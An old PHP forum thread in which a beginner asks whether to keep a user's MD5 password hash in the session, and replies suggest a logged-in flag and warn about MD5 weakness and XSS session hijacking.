Should you store password in session?

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
bradles
Forum Commoner
Posts: 89
Joined: Wed Jun 30, 2004 10:40 pm

Should you store password in session?

Post by bradles »

Hi All,

Is it a bad idea to store a users md5 password in a session? Can we get by without it being in there?

Sorry...i'm fairly new to writing a login script.

Brad.
rehfeld
Forum Regular
Posts: 741
Joined: Mon Oct 18, 2004 8:14 pm

Post by rehfeld »

its not that bad. it really depends how safe you need to be. if its md5'ed its pretty safe though. you weak points are likely in other places.

but it would probably be better to just use something like

Code: Select all

if (submitted username and password are correct) {
    $_SESSION['logged_in'] = true;
}


// then just check on subsequent pages

if (empty($_SESSION['logged_in'])) {
    echo 'not logged in';
} else {
    // ok
}
bradles
Forum Commoner
Posts: 89
Joined: Wed Jun 30, 2004 10:40 pm

Post by bradles »

Thanks rehfeld. Much appreciated.
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Post by John Cartwright »

bradles wrote:Thanks rehfeld. Much appreciated.
To answer your question I would recommend you do not. Md5 hashes can be broken, and sessions can be hijacked. If someone REALLY wanted to with a bit a research it could be accomplished.
User avatar
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

As above - password in session is risky. It's low risk, but it's there all the same.

I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ javascript, etc. in any text they submit - for example setting something simple like a MSN contact detail to point to a js file using script tags which steals some user cookie details - like sessid...:(

Something to think about...
User avatar
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto
Contact:

Post by John Cartwright »

Maugrim_The_Reaper wrote:As above - password in session is risky. It's low risk, but it's there all the same.

I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ javascript, etc. in any text they submit - for example setting something simple like a MSN contact detail to point to a js file using script tags which steals some user cookie details - like sessid...:(

Something to think about...
hehe, nice idea lol
User avatar
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

It's not so funny when it happens to you...:) I've seen it in action on a test case.
Post Reply